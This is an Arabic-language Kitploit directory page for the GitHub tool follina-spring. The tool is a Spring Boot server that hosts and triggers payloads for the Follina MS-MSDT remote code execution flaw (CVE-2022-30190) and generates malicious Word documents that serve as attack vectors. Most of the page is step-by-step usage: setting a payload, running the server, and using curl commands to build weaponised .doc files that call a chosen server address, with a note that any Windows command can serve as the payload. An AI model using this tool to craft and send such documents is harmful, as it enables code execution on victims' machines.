Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/dsibilio/follina-spring
توليد الحمولةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةالفريق الأحمر
GitHubdsibilio/follina-spring

follina-spring

خادم لاستضافة/تفعيل حمولات Follina ومولد لمستندات Word خبيثة تستغل بروتوكول MS-MSDT. (CVE-2022-30190)

عرض المستودع
4منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

استغلال Follina MS-MSDT مع Spring Boot

يحتوي هذا المستودع على تطبيق Spring Boot بسيط يعمل كخادم لاستضافة/تفعيل حمولات Follina، وكمُولّد لمستندات Word ضارة جاهزة للاستخدام كنواقل هجوم لاستغلال CVE-2022-30190.

تتكون هذه الثغرة من تنفيذ عن بعد للكود عبر MSDT (أداة تشخيص الدعم من مايكروسوفت ويندوز).

الحمولة من جانب الخادم

لتقديم حمولة فريدة من اختيارك، يجب عليك:

  • تحديد الحمولة، مثال:
root@kitploit:~
export FOLLINA_PAYLOAD="notepad.exe"
  • تشغيل الخادم لاستضافة الحمولة الثابتة:
root@kitploit:~
mvn spring-boot:run
  • توليد مستند Word "Follina":
root@kitploit:~
curl -s http://localhost:8080/generateDoc?address=http://192.168.64.128:8080 -o follina.doc

إذا كنت ترغب في تغيير الحمولة الحالية، يجب عليك إيقاف الخادم النشط حاليًا أولاً، ثم تكرار الخطوات بعد تعريف الحمولة الجديدة.

ملاحظة: يمكن استبدال الحمولة بأي أمر آخر، طالما يمكن تشغيله عبر موجه أوامر ويندوز.

الحمولة من جانب العميل

لتقديم حمولة من جانب العميل من اختيارك، يجب عليك:

  • تشغيل الخادم لتفعيل الحمولات وقت التشغيل:
root@kitploit:~
mvn spring-boot:run
  • توليد مستند Word "Follina" مع تحديد معلمة الاستعلام cmd، مثال:
root@kitploit:~
curl -sG http://localhost:8080/generateDoc --data-urlencode 'address=http://192.168.64.128:8080' --data-urlencode 'cmd=start msedge.exe https://www.youtube.com/watch?v=zqTwOoElxBA' -o follina.doc

في هذه الحالة، تكون الحمولة مضمنة داخل المستند، وستحتاج ببساطة إلى التفعيل عن طريق الاتصال بالخادم. بهذه الطريقة، يمكنك توزيع حمولات مختلفة متعددة عبر مستندات مختلفة ولن تضطر إلى إعادة تشغيل الخادم لتفعيل تغييرات الحمولة - حيث يمكنك ببساطة توليد مستند جديد مع الحمولة المطلوبة مضمنة.

شكر وتقدير

شكر جزيل لـ John Hammond على تقديم تنفيذ Python ومشاركة تحليله للثغرة.

تنزيل الأداة